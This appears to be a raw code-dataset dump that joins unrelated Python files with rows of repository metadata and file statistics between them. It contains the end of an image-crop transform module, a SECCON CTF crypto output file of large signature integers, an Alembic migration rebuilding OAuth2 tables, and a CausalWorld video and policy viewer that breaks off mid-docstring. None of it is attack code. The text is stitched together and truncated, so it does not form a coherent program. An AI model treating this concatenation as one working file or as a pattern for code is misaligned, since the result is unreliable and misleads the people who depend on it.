y1 = random.randint(0, h - self.crop_size)
img = img.crop((x1, y1, x1 + self.crop_size, y1 + self.crop_size))
mask = mask.crop((x1, y1, x1 + self.crop_size, y1 + self.crop_size))
return {'image': img,
'label': mask}
class FixScaleCrop(object):
def __init__(self, crop_size):
self.crop_size = crop_size
def __call__(self, sample):
img = sample['image']
mask = sample['label']
w, h = img.size
if w > h:
oh = self.crop_size
ow = int(1.0 * w * oh / h)
else:
ow = self.crop_size
oh = int(1.0 * h * ow / w)
img = img.resize((ow, oh), Image.BILINEAR)
mask = mask.resize((ow, oh), Image.NEAREST)
# center crop
w, h = img.size
x1 = int(round((w - self.crop_size) / 2.))
y1 = int(round((h - self.crop_size) / 2.))
img = img.crop((x1, y1, x1 + self.crop_size, y1 + self.crop_size))
mask = mask.crop((x1, y1, x1 + self.crop_size, y1 + self.crop_size))
return {'image': img,
'label': mask}
# resize to 512*1024
class FixedResize(object):
"""change the short edge length to size"""
def __init__(self, resize=512):
self.size1 = resize # size= 512
def __call__(self, sample):
img = sample['image']
mask = sample['label']
assert img.size == mask.size
w, h = img.size
if w > h:
oh = self.size1
ow = int(1.0 * w * oh / h)
else:
ow = self.size1
oh = int(1.0 * h * ow / w)
img = img.resize((ow, oh), Image.BILINEAR)
mask = mask.resize((ow, oh), Image.NEAREST)
return {'image': img,
'label': mask}
# random crop 321*321
class RandomCrop(object):
def __init__(self, crop_size=320):
self.crop_size = crop_size
def __call__(self, sample):
img = sample['image']
mask = sample['label']
w, h = img.size
x1 = random.randint(0, w - self.crop_size)
y1 = random.randint(0, h - self.crop_size)
img = img.crop((x1, y1, x1 + self.crop_size, y1 + self.crop_size))
mask = mask.crop((x1, y1, x1 + self.crop_size, y1 + self.crop_size))
return {'image': img,
'label': mask}
class RandomScale(object):
def __init__(self, scales=(1,)):
self.scales = scales
def __call__(self, sample):
img = sample['image']
mask = sample['label']
w, h = img.size
scale = random.choice(self.scales)
w, h = int(w * scale), int(h * scale)
return {'image': img,
'label': mask}
class TransformTr(object):
def __init__(self, resize, multi_scale=None):
if multi_scale is None:
self.composed_transforms = transforms.Compose([
FixedResize(resize=resize),
# RandomCrop(crop_size=args.crop_size),
# tr.RandomScaleCrop(base_size=self.args.base_size, crop_size=self.args.crop_size, fill=255),
# tr.RandomGaussianBlur(),
# Normalize(mean, std),
# ToTensor()
])
else:
self.composed_transforms = transforms.Compose([
FixedResize(resize=args.resize),
RandomScale(scales=args.multi_scale),
RandomCrop(crop_size=args.crop_size),
# tr.RandomScaleCrop(base_size=self.args.base_size, crop_size=self.args.crop_size, fill=255),
# tr.RandomGaussianBlur(),
Normalize(mean, std),
ToTensor()])
def __call__(self, sample):
return self.composed_transforms(sample)
class TransformVal(object):
def __init__(self, args, mean, std):
self.composed_transforms = transforms.Compose([
FixedResize(resize=args.resize),
FixScaleCrop(crop_size=args.crop_size), # TODO:CHECK THIS
Normalize(mean, std),
ToTensor()])
def __call__(self, sample):
return self.composed_transforms(sample)
| 38.336434
| 131
| 0.576576
| 3,512
| 24,727
| 3.900342
| 0.065774
| 0.040882
| 0.025551
| 0.038473
| 0.836691
| 0.823697
| 0.802015
| 0.792816
| 0.776756
| 0.75522
| 0
| 0.034569
| 0.27468
| 24,727
| 644
| 132
| 38.395963
| 0.729189
| 0.124358
| 0
| 0.752193
| 0
| 0
| 0.02804
| 0
| 0
| 0
| 0
| 0.001553
| 0.002193
| 1
| 0.127193
| false
| 0.002193
| 0.02193
| 0.004386
| 0.280702
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a01f286ce34a187cec021722e7bce14373779bc8
| 19,736
|
py
|
Python
|
crypto/Sign_Wars/solver/output.py
|
SECCON/SECCON2021_online_CTF
|
628008ae2d150723352aed2c95abff41501c51f2
|
[
"Apache-2.0"
] | 7
|
2022-02-07T10:15:22.000Z
|
2022-02-10T07:13:07.000Z
|
crypto/Sign_Wars/solver/output.py
|
SECCON/SECCON2021_online_CTF
|
628008ae2d150723352aed2c95abff41501c51f2
|
[
"Apache-2.0"
] | null | null | null |
crypto/Sign_Wars/solver/output.py
|
SECCON/SECCON2021_online_CTF
|
628008ae2d150723352aed2c95abff41501c51f2
|
[
"Apache-2.0"
] | null | null | null |
sigs1 = [(12122920644857436418668108677431446821511965161835906257619686170008223981633617118848536864333256883344783807472533, 14197268540776373741177673820089672023976732299858030846681305575389640921071188098294211283607291412628404706330635), (30023311263693682916692119631904793161812704258670063725046946028381482586508452744969994191586576481159969039892535, 16094000621518284822857020964974522983541224425681758135622160784082988267314022122458996489586892811938506732931748), (20274365333087648992099914855887452427265725062234768121150756210734918282305324594709095440941680006674472249980168, 26128948049631412381227970242480771408976962602375493955244402440727109476811862753343673422200707132102306861245065), (30768939097894626895378677401324579041720728810052060616179712179254924186139940391745214635086621700092451846257475, 23800973758418165064781275855199658315920145808589994209139192398347876290686870300287776343940629270010735723235385), (28473557828088061979399196473136471402585047600303142695341163640729652130707043952255899907766676152597539289628315, 28281625820520087035698954279133768588017050298800453267610958044101108252535161164763310762642756504428205563108030), (961118250385917764507600420510572217848406774402919254807074729943580199634194943936928534369937371624710732726857, 24031640471683802687061395705285266808842836983869848057857017127967668008272515010890509063551366550912420338902834), (19370494654235267454217217719890760732479633443331393690560476118111139682942513564572505092689607226193201989778575, 2433781820944268337733283393291854175920938847482642777771696759267025446311242119383222969981818996711424713151752), (30779090043894032830605276175884042975994811516472755795216312382846355682168692296678880256197033821390044997147420, 4893123418105561169402880287889300261310663472852291300562230045024356786173678817075957809203454759484532173136896), (14643705489977528788970058117566828771249298225825962912655208159781673578193298484890200020885473583280037544119578, 15935318488540400173648065087608623889419958306790544362968141852933585912044021990423536612481693468915965522445032), (26190847735254363003436975683906714419695452818227446664219556609524851687182160032913188662574521358473164521270318, 1593531527201615623099098664942415943763347197253061444470827851943278116759392933621884906245655648264221554908273), (2444983458103763169338770323724579409115782087673217289810500838726321984003897473707801517318376539252731600634354, 31519693975000372684536588360058886155393128374920715958105917368560178529829092541542334254564649031015390295526257), (5539202944379041047645815730619570855915700610921747198866014997007285622810384696777658611658354790466198556409538, 20332957999843652613921660609152489318731466697459198872422541589848932160246010821103577261742306246402279741839395), (29969504934312616092773577215293054327868412131595687908164133237389228991764362661689008330244463167067377417804848, 23502790732595477415220062415069646202303453814634558339724957279860279173977141614843448086419994681526804050994011), (28663099246038192816273570466053103880330161954725039364215397713591731084208919109404788115439838323705057354906183, 32343362746546345028906807296090845637927648209201182279186066312617262402540993950717856425293636562311369826695241), (37811425966842340383821228402925951424928841073943712670686829246012732634532778206829440348798738360996829177934659, 1512161086988707363568355555539355341485927942150807857139424735463213909258176919376930783632168090029799006962452), (6779019396487335250176376177316480940562897505935292947586838966405847326392683369310422331267556304950213385562403, 21277628400501469478914168423023057684740585069176201105893608414023541256985765180901007757435611069875893412465586), (6366948926057872251073324724715646697709396244107534411996999604518484325522941417643164680481781327650121512161589, 31835229197999276237723592037000880402276309404799202930304320555417861589116989270114086456362377584676026798317441), (15281845709607491920369813817013377362178255708702641554534892473368410191641487999506001924287614983557554388444790, 2984115935788221541188290047888309109458147722093547866020985007410124451071701982135991689832422756636714734848410), (17261327950609380032505415413729345506837563477802335104261903199945292046286371909764527605537844250765520460420883, 4414083024903566067346682354660036193755195663970474589205389345245255956774402052618861533800845720100684618788066), (23285217326555475016519552330905568382923977489456237456732496253903350233528472100890947226393609572097915969599580, 15864787645844524123645508552473833769050437498168559566442342764983309617043514215685980718642756051823094216138112), (38735613502207617543460798902089924117030110156904845492417889885452926231509412677457364662728826603870166089048783, 2764799580566369130997255183073579096790304637375189258729225097121531798414933779603126159724061297478107963529944), (34397686468933908386713398593117199247477408535310063872486364205758893481567076156685158122992765644664863620408441, 32278070177934959080616216483052122171696315094028362684579162316990518944414668141213923548802330689237360305444057), (36888596144580310076666982554379754727579693141157953039821763246320596624002076072694376360349327605151628461938344, 20359599307803961599163637268447617008934461534173375543520973121462531279483793982707344429872033956688432496029494), (35731945369165024527067708422190934453114426930189147171662677061124488912009487138831725596607769036223677431254394, 38690463610329621441610277699868091296837875356478232771729649752351130839647804626642276143604085382240751091874980), (23677628634176723569940322462564200990434883563619558260828733247431579872437268289228719660272457754577432647629267, 5694960089075991074464290708570332306998548315951489339220678741537951501152608587055469175810163056202380723484162), (36183304484234246866110911449167537754372333309427114844147387618829024530231991189605158113348204109845980352696465, 23965168344478037213105641624609514777278543321778037076016154890855496855531577133265749426868642365368798849451496), (33162978581198415974999091637775219015609843478885981431365405627376986149964493390352996432902431398214990453120700, 17522675770165519045405383886383499046920674272323023864859028070652034097791735019059447013185908178315975726718027), (37977524287531621731269652998518444039221788561001084681446374543680582455529006667074181965831283556770601026406412, 34014871750340380154692206012455554620218508761966344769331999972401940089831171697348255247018267326994810496665301), (1507013781859412581460229968016871686472000162722420853292672399595213588246897578540619347856535893357627270900677, 7123198841569413454577310078272821534024280579100722414329202844057424863366193509058084349838170744321137899380851), (16162098325755207229063189997383396611921725235544867443071126936768120496007100174087010708793986788501933456531117, 35843125491563878831891747420494968566047358046579202101829199006631647636438358745741154644883785641557638179703196), (27146246587667190740076698462480327352334872042637035686499133830505424921309618795732649623443166432157485441206513, 29374852723618836996041990307719900335299612538156861129617267376582701400599574166091116228943846822827095705431420), (20318873596559259511055531147506382540328039101211632617939893607230146992770755366357547004154440123877927279562805, 21880244506505391597381900288791130929029500377960791610120410522262499720103003893165761379437860585723438454338357), (2677089679217144714677235060642211123498261589343453643587089980258267670810054471717380695130400677765718942750715, 22811216118007709181671732510261424038689262085998138698823325592895788252084744051591190795979078528619437443272430), (28242261012068041277293540110291951864968606243755362285072828317158908834811289543798540567848975185502994215611619, 28337300861435742639020944587343125537033416178222051556584188414720653042082343068603170738957875834942311839398955), (21313784566242236288558209540398728358450102518073033970974355085249250643681779922552823541265620185702575612865123, 25973923581441774490467725510310356393118571760442289368631380634139185801852675014798484820655377425355874214608838), (3972247474338783322467875314927935482812576258324764658865475177091575186850519760736477068863287011253657979695035, 1949243324150001215851803463575673078965313534368782887187770074096642168523503805499517384914614086023503127806847), (1151944487736036555640946065337093366220353301888076465796765130037778971904962274932934887966419998200175365995781, 19564575441055199178132952897543045993451659948447588920651596150288550414960098453945167530353880987093029030638144), (34162335734397557091228494111777449419659314364130585745202913773828419992559542465196157154618586692393424347136785, 34816069361672535828713924897177961374080352312052306803897119805834580104455380505473277752161016451540002438069017), (6214420518977400720115040915606936189332457649954029722703185627542783153439822172938794340141280694328697860997151, 35036609860976357406366810820445499231048373436931375253989834911997779342195269560660560149275988782146654615055395), (17932296848485476028307829364900722350664622103067434376880482465660776884118027615894824834062520974562950696190800, 25284454559391441356742861992714899157880349238554132025565451660342323497911181209889041052025003714876311648649308), (16729838562359475474212958363183560420250559702291016364521051500450026103395443198630456476103970943753669154249375, 32346909821898954875794104426207252965578694675212598600013619876939291316966520281348030524571180602992351937324549), (18383357524600760202019477696462766408564829389632201092711392752822975200725339011191785469174324590811632757501470, 36650204800420829652120261290123142229312040551658496656556239024215868372978503733453573308931372634821353503537954), (12679474326846184225965528024726547768506690550379875402442700592477187625032566343282886015393973299453970347716666, 31594434445787142355786158780673084733603186104893515951267587710628733125154787164728421585888101421671404571441460), (1460155946173513465605000753006943939473815980031454177632679861455928714118380298806901823644725063756743440478323, 28595065903087426074566358753005915622433302916683368431103530322432724436087166807363512661383021500064699866636573), (1712191697812545578149205758294464160112058894608923583568724616471266315677289849142337215940784518880963429394123, 15549321728923260877275319522523938368845573355479005888471636555747793775030205015093656278438688710952666664504896), (27247850567913925982695067834491518101584714379758703325384826250084810338850873054903173768682909886315224820151843, 18441987213600418235028717811172592400392968984874201495657937932256496057636260779718506455774046512049959224326533), (23125206105423712170494578086460408200155706950388584751758217770641881139847092343076320949651253557057860975699290, 617384558916714490913646402391877958626488085682864653677413549966260928717156654411337297014822767990795093863229), (10309859796084513086949474325745742289943652601164042295798749216013816749262406978527658506169631041432182034483264, 3401470346181096624340649421457463749621102267436616681750603386976006189520143441710738979453350404845158395485486), (16368609105601996512123657503983976901814846135585476552914466414979175179581723778823773810904335136988607343388641, 12887327683770298631686858909410191002874101297863064763857850276211374735131663350575035482893318627486961140493060), (12597783086712780955829102511325977339556480314456317226084059427852975744410298400466570369739729859822682094743763, 18143629657739573817392351951162537846408025200449845703036545707816887229856135678162116712273281752461460773286157), (18149765203212365095922365541429595804115110638460797557247425663278065057761683694963435074306083146559748910820933, 4623808735710466757897562443056494514986872251154643072124080945722371896930429940197336707416267350592331887509370), (36685770489292450862829854673422281288659959443468144451918042753101522158121942740628396053876144087903556902670459, 25427602196870003078247382997147130945403862270376348600679340464766087619183853473530884327535652383782148396318369), (26400994935887323685812785588779777604807033818459784383379336636723016041989131355813709350621150638600337397745755, 35441443644761879722810537983899640132591168390041946180094287752185744760148684344825560100034902852843703022913572), (21549464322285949487974060839290414317291085580470644413175603703659811599686802128539665387707492575120952990974169, 27426668476821276280862019979056999027369355304092859933896625743859680072036382523929860072977660288769061968841056), (17945055270149004672174407200101186426733019188557222629374387229166321253248131455944582958258851086680992327717775, 22763432714358352994467634787642451136567944768237186044385733037319457391071748311079692136983455628393624590912773), (19679372898006128640291583077178951435604248960537272688952385068434563933226836358777706619530975918926211454093254, 22558450199634522395989325930989798822306499440080795289426594476903491433232767149595712438138190142613146382805102), (5053808002622613648696016012235196453213394765089545993472533920762659290879000238284401142373566610359754334503119, 25596265678131212259962460250737224350948937567171043241527736952385125964273084970352617767438577469728391374901104), (35021535942876477664620323193569084612777266590551110729944867045139787961246598034847607119451282633173220627617528, 24412900363309066203864154425415165066253353692376637520978763141267068333052991517573772819303004361631432100082761), (30382344157317014521174359938595199590313101376532894077961655976102849666994412986977757526700903573837979050569748, 36380054077835016119489703494179753668737802402599719907220000486624011084909818429478518718710302969894134810399414), (23392455319924374624407363218414017792726341637348154289368001919553092631539423722056128035028761955761251335231397, 24615969593765671009089175669046441351199855489516238368580612855661905474214253402259306074086838224100682009493110), (39043410087571658849777088723644840444773112471772958075589595817236649732325361138357268471190048890890922330173113, 24256166337102519478716198099822063504670413826816008063467295625641151486658627000887001654580846329391802379723304), (25198309246276017483121163348865597630643532403493815715878126594393814779012937502862557889192295110821475991529943, 31183736084868762605705341491981967451872193027043779034558377529784073696083378450370565887268611112401715464692322), (21490370993563026264971775993182460905215869236047670304210535706894812928914407971234995821500730800223031598266257, 30524538483293986209920139400952501355824771895617776073345360374702907548949007510552008565834914052456239691889902), (37366673614850776444692939328421732388527123695286819437966655615675408069366910860035074204029318799945903064048527, 17779215295739572760353458898043288811931339150166396214780752407992014275252723707803456409767620788479105600423376), (23880907135038389168803046756901468214206189168117058906553768830712533102670877117203361468021971439264847643087559, 36554798683087533081747521419888907675190192122029480300791517998074362122003489313160167552894436296245959628579534), (1839816617790796393877679129129689526692744195784843313918019394276687774692559082426410650970115204065124516740192, 33280887100325540541044876347841631022975706016854603366960877001893277240119020663116400162762880357011028194015505), (37860238532878533314237881709991803144640720532159211259802653676233680439794809051955788290617724291896314228484287, 2079530852252634619529204167324028013909690544367420298080750988365566999876311319237386168370876748621061304030325), (33076401294910426866408725898185517353797089714631638085904654063741185770239407827102674966897738352568845852795461, 32388782563029207071708238813265723145823101733798639269010838632868478704546695027802504168693070745244529700498871), (19664630416995907039268499340971147354543906991316471257330973370399289180202716179184726176333997501833047008445188, 15010332454096306874561434765152776137424843532232617982537812287828972466131420109345949260515569323587248864746943), (25871769372685370569925822425693820620619794598214474123600511253778185796962172073208206762818745309605540739100621, 12733332659612677892428319839726866498876500931386736309794894873372522229292842342178191364595143966422220824826073), (12769045455084894273436527159204816902432305644017210629296787933904295785281457448881044929402038399496940189044093, 11594689177180251431669445510565369712938818714831055440921516382728285369019679675944135089038247905820859659761517), (1865703770871313754195006900013207845562542245675070113698481870088723236246390202799490489472079377268354306242668, 5125550573798542551697831171912361478992101952449490976854228951650529010822626202419835861052330070344633285976669), (37096662612327463148937337171394483039720908237996642157433470567568444060739072904671016601404440533704833919544285, 4790007747398249736115034551686542360219836448905259482276520130644298771477774260329772071196479778643314968168876), (31170630741028077467666117690922124046397732731173001565911078911132891410318903435039074418130660922292175028485161, 36700267333965429842826985729957565986107482356086995641315664499740118242353501066703906197210995388334971341587044), (16429305562010070045918008502995674904932019310071872766389089174936173832847431470110417157600205840910967654695105, 13348678473612360711357762565221644167552517488898971900250507563637477504294039445796012121832852740292220571524010), (36814999620410624650408927593101102311832288601200212772521220280747373268407838162653769833122342138193850888479316, 21678377395564601107395386759737337329969405189315349034054067649380849056748928922052454754064625128419150919292053), (37080204662579811419723925250553811343118062800721020347850990442377486549932418090303179252403198539322519694444276, 15821341762768738218228176979267566826815656142437698746345759451195866137662375460664107143767858376489559348158119), (31900665212807794653067892050991087787174739879112603157270515722601016232361976337248279931832041244757837789022461, 11910037530034363325480855721128870881334951395240192762039726365170413466292618778748338552446589898886095541743053), (22713234938446144853039935121713734891074107932043602957345904095128407091303028830418630224869359322276067322228220, 37648033797699949313050109414984677478246381964295991074283362304879984221990727828373537248000765921622593274507531), (26966642227721045071442724645484661519368889576738311756067876287666319883156972945382104473351822669036919304411830, 33837552398136675647634120649336283866568054003022435569393484219100126804419072284913749466938666527692475735307495)]
sigs2 = [(1049639883029709557497416807885448950887522866921671928450292553333188509467250311602354191758381412870243165308138, 34790284668131148498252310249426530965492667679223859021102993403672099203069041205214172414075756555276490789178956), (3085218467051892206002417901865728576393577451338770207618129262272350718747277968031614020531383301753358875936613, 35069145156217342955289020258826302551823920792084376060949622353808056721610402437441970841628302496074418474626297), (24094905265337534276165828047859782238987431219303883218554480297297861668847922558928617159973811943649844468445020, 9328776074819457901331657355801560516363178058099225535915537394781684440774078985119798155365962514386879323530606)]
| 6,578.666667
| 19,015
| 0.974362
| 168
| 19,736
| 114.464286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.982418
| 0.008614
| 19,736
| 2
| 19,016
| 9,868
| 0.000409
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4ea3fc9e075d777316aa4907136d311c976659d5
| 5,497
|
py
|
Python
|
migrations/versions/22069cad6602_restructure_oauth2_models.py
|
akebrissman/id.mkdevops.se
|
5a9a7a5df33a24f5c367cd476fa547a300e66ea9
|
[
"Apache-2.0"
] | 7
|
2017-09-04T10:24:02.000Z
|
2019-12-02T13:12:30.000Z
|
migrations/versions/22069cad6602_restructure_oauth2_models.py
|
akebrissman/id.mkdevops.se
|
5a9a7a5df33a24f5c367cd476fa547a300e66ea9
|
[
"Apache-2.0"
] | 140
|
2017-09-06T07:02:18.000Z
|
2022-02-26T01:26:25.000Z
|
migrations/versions/22069cad6602_restructure_oauth2_models.py
|
akebrissman/id.mkdevops.se
|
5a9a7a5df33a24f5c367cd476fa547a300e66ea9
|
[
"Apache-2.0"
] | 2
|
2017-09-13T16:42:57.000Z
|
2018-02-15T15:32:40.000Z
|
"""Restructure OAuth2 models.
Revision ID: 22069cad6602
Revises: d7b1b886bf92
Create Date: 2017-11-02 13:41:43.920256
"""
from __future__ import absolute_import, division, print_function, unicode_literals
import sqlalchemy as sa
from alembic import op
# Revision identifiers, used by Alembic.
revision = '22069cad6602'
down_revision = 'd7b1b886bf92'
branch_labels = None
depends_on = None
def upgrade():
"""Re-create tables 'clients', 'grants' and 'tokens'."""
op.drop_table('tokens')
op.drop_table('grants')
op.drop_table('clients')
op.create_table(
'clients',
sa.Column('client_id', sa.String(length=32), nullable=False),
sa.Column('client_secret', sa.String(length=256), nullable=False),
sa.Column('created_by', sa.Integer(), nullable=False),
sa.Column('is_confidential', sa.Boolean(), nullable=False),
sa.Column('_redirect_uris', sa.Text(), nullable=False),
sa.Column('_default_scopes', sa.Text(), nullable=False),
sa.Column('name', sa.String(length=64), nullable=True),
sa.Column('description', sa.String(length=400), nullable=True),
sa.ForeignKeyConstraint(['created_by'], ['users.id'], ),
sa.PrimaryKeyConstraint('client_id'),
sa.UniqueConstraint('client_secret')
)
op.create_table(
'grants',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('client_id', sa.String(length=32), nullable=False),
sa.Column('code', sa.String(length=256), nullable=False),
sa.Column('redirect_uri', sa.String(length=256), nullable=False),
sa.Column('expires_at', sa.DateTime(), nullable=False),
sa.Column('_scopes', sa.Text(), nullable=False),
sa.ForeignKeyConstraint(['client_id'], ['clients.client_id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id')
)
op.create_table(
'tokens',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('client_id', sa.String(length=32), nullable=False),
sa.Column('token_type', sa.String(length=40), nullable=False),
sa.Column('access_token', sa.String(length=256), nullable=False),
sa.Column('refresh_token', sa.String(length=256), nullable=False),
sa.Column('expires_at', sa.DateTime(), nullable=False),
sa.Column('_scopes', sa.Text(), nullable=False),
sa.ForeignKeyConstraint(['client_id'], ['clients.client_id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('access_token'),
sa.UniqueConstraint('refresh_token')
)
def downgrade():
"""Revert to old version of tables 'clients', 'grants' and 'tokens'."""
op.drop_table('tokens')
op.drop_table('grants')
op.drop_table('clients')
op.create_table(
'grants',
sa.Column('id', sa.INTEGER(), nullable=False),
sa.Column('user_id', sa.INTEGER(), nullable=False),
sa.Column('client_id', sa.INTEGER(), nullable=False),
sa.Column('code', sa.VARCHAR(length=256), nullable=False),
sa.Column('redirect_uri', sa.VARCHAR(length=256), nullable=False),
sa.Column('expires_at', sa.DATETIME(), nullable=False),
sa.Column('_scopes', sa.TEXT(), nullable=False),
sa.ForeignKeyConstraint(['client_id'], ['clients.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id')
)
op.create_table(
'tokens',
sa.Column('id', sa.INTEGER(), nullable=False),
sa.Column('user_id', sa.INTEGER(), nullable=False),
sa.Column('client_id', sa.INTEGER(), nullable=False),
sa.Column('token_type', sa.VARCHAR(length=40), nullable=False),
sa.Column('access_token', sa.VARCHAR(length=256), nullable=False),
sa.Column('refresh_token', sa.VARCHAR(length=256), nullable=False),
sa.Column('expires_at', sa.DATETIME(), nullable=False),
sa.Column('_scopes', sa.TEXT(), nullable=False),
sa.ForeignKeyConstraint(['client_id'], ['clients.id'], ondelete='CASCADE'),
sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('access_token'),
sa.UniqueConstraint('refresh_token')
)
op.create_table(
'clients',
sa.Column('id', sa.INTEGER(), nullable=False),
sa.Column('client_id', sa.VARCHAR(length=64), nullable=False),
sa.Column('client_secret', sa.VARCHAR(length=256), nullable=False),
sa.Column('created_by', sa.INTEGER(), nullable=False),
sa.Column('is_confidential', sa.BOOLEAN(), nullable=False),
sa.Column('_redirect_uris', sa.TEXT(), nullable=False),
sa.Column('_default_scopes', sa.TEXT(), nullable=False),
sa.Column('name', sa.VARCHAR(length=64), nullable=True),
sa.Column('description', sa.VARCHAR(length=400), nullable=True),
sa.CheckConstraint('is_confidential IN (0, 1)'),
sa.ForeignKeyConstraint(['created_by'], ['users.id'], ),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('client_id'),
sa.UniqueConstraint('client_secret')
)
| 42.945313
| 90
| 0.643806
| 653
| 5,497
| 5.292496
| 0.156202
| 0.108796
| 0.186632
| 0.236979
| 0.878762
| 0.853877
| 0.821759
| 0.802373
| 0.734086
| 0.655671
| 0
| 0.023736
| 0.179916
| 5,497
| 127
| 91
| 43.283465
| 0.742902
| 0.049482
| 0
| 0.586538
| 0
| 0
| 0.172268
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.019231
| false
| 0
| 0.028846
| 0
| 0.048077
| 0.009615
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4eb0273a0dde3fffb286aa8461e3553bf997542b
| 10,711
|
py
|
Python
|
causal_world/viewers/task_viewer.py
|
michaelfeil/CausalWorld
|
ff866159ef0ee9c407893ae204e93eb98dd68be2
|
[
"MIT"
] | 2
|
2021-09-22T08:20:12.000Z
|
2021-11-16T14:20:45.000Z
|
causal_world/viewers/task_viewer.py
|
michaelfeil/CausalWorld
|
ff866159ef0ee9c407893ae204e93eb98dd68be2
|
[
"MIT"
] | null | null | null |
causal_world/viewers/task_viewer.py
|
michaelfeil/CausalWorld
|
ff866159ef0ee9c407893ae204e93eb98dd68be2
|
[
"MIT"
] | null | null | null |
from causal_world.envs.causalworld import CausalWorld
from gym.wrappers.monitoring.video_recorder import VideoRecorder
from causal_world.task_generators.task import generate_task
import numpy as np
def view_episode(episode,
env_wrappers=np.array([]),
env_wrappers_args=np.array([])):
"""
Visualizes a logged episode in the GUI
:param episode: (Episode) the logged episode
:param env_wrappers: (list) a list of gym wrappers
:param env_wrappers_args: (list) a list of kwargs for the gym wrappers
:return:
"""
actual_skip_frame = episode.world_params["skip_frame"]
env = get_world(episode.task_name,
episode.task_params,
episode.world_params,
enable_visualization=True,
env_wrappers=env_wrappers,
env_wrappers_args=env_wrappers_args)
env.reset()
env.set_starting_state(episode.initial_full_state, check_bounds=False)
for time, observation, reward, action in zip(episode.timestamps,
episode.observations,
episode.rewards,
episode.robot_actions):
for _ in range(actual_skip_frame):
env.step(action)
env.close()
def view_policy(task,
world_params,
policy_fn,
max_time_steps,
number_of_resets,
env_wrappers=np.array([]),
env_wrappers_args=np.array([])):
"""
Visualizes a policy for a specified environment in the GUI
:param task: (Task) the task of the environment
:param world_params: (dict) the world_params of the environment
:param policy_fn: the policy to be evaluated
:param max_time_steps: (int) the maximum number of time steps per episode
:param number_of_resets: (int) the number of resets/episodes to be viewed
:param env_wrappers: (list) a list of gym wrappers
:param env_wrappers_args: (list) a list of kwargs for the gym wrappers
:return:
"""
actual_skip_frame = world_params["skip_frame"]
env = get_world(task.get_task_name(),
task.get_task_params(),
world_params,
enable_visualization=True,
env_wrappers=env_wrappers,
env_wrappers_args=env_wrappers_args)
for reset_idx in range(number_of_resets):
obs = env.reset()
for time in range(int(max_time_steps / number_of_resets)):
#compute next action
desired_action = policy_fn(obs)
for _ in range(actual_skip_frame):
obs, reward, done, info = env.step(action=desired_action)
env.close()
def record_video_of_policy(task,
world_params,
policy_fn,
file_name,
number_of_resets,
max_time_steps=100,
env_wrappers=np.array([]),
env_wrappers_args=np.array([])):
"""
Records a video of a policy for a specified environment
:param task: (Task) the task of the environment
:param world_params: (dict) the world_params of the environment
:param policy_fn: the policy to be evaluated
:param file_name: (str) full path where the video is being stored.
:param number_of_resets: (int) the number of resets/episodes to be viewed
:param max_time_steps: (int) the maximum number of time steps per episode
:param env_wrappers: (list) a list of gym wrappers
:param env_wrappers_args: (list) a list of kwargs for the gym wrappers
:return:
"""
actual_skip_frame = world_params["skip_frame"]
env = get_world(task.get_task_name(),
task.get_task_params(),
world_params,
enable_visualization=False,
env_wrappers=env_wrappers,
env_wrappers_args=env_wrappers_args)
recorder = VideoRecorder(env, "{}.mp4".format(file_name))
for reset_idx in range(number_of_resets):
obs = env.reset()
recorder.capture_frame()
for i in range(max_time_steps):
desired_action = policy_fn(obs)
for _ in range(actual_skip_frame):
obs, reward, done, info = env.step(action=desired_action)
recorder.capture_frame()
recorder.close()
env.close()
def record_video_of_random_policy(task,
world_params,
file_name,
number_of_resets,
max_time_steps=100,
env_wrappers=np.array([]),
env_wrappers_args=np.array([])):
"""
Records a video of a random policy for a specified environment
:param task: (Task) the task of the environment
:param world_params: (dict) the world_params of the environment
:param file_name: (str) full path where the video is being stored.
:param number_of_resets: (int) the number of resets/episodes to be viewed
:param max_time_steps: (int) the maximum number of time steps per episode
:param env_wrappers: (list) a list of gym wrappers
:param env_wrappers_args: (list) a list of kwargs for the gym wrappers
:return:
"""
actual_skip_frame = world_params["skip_frame"]
env = get_world(task.get_task_name(),
task.get_task_params(),
world_params,
enable_visualization=False,
env_wrappers=env_wrappers,
env_wrappers_args=env_wrappers_args)
recorder = VideoRecorder(env, "{}.mp4".format(file_name))
for reset_idx in range(number_of_resets):
obs = env.reset()
recorder.capture_frame()
for i in range(max_time_steps):
for _ in range(actual_skip_frame):
obs, reward, done, info = \
env.step(action=env.action_space.sample())
recorder.capture_frame()
recorder.close()
env.close()
def record_video_of_episode(episode,
file_name,
env_wrappers=np.array([]),
env_wrappers_args=np.array([])):
"""
Records a video of a logged episode for a specified environment
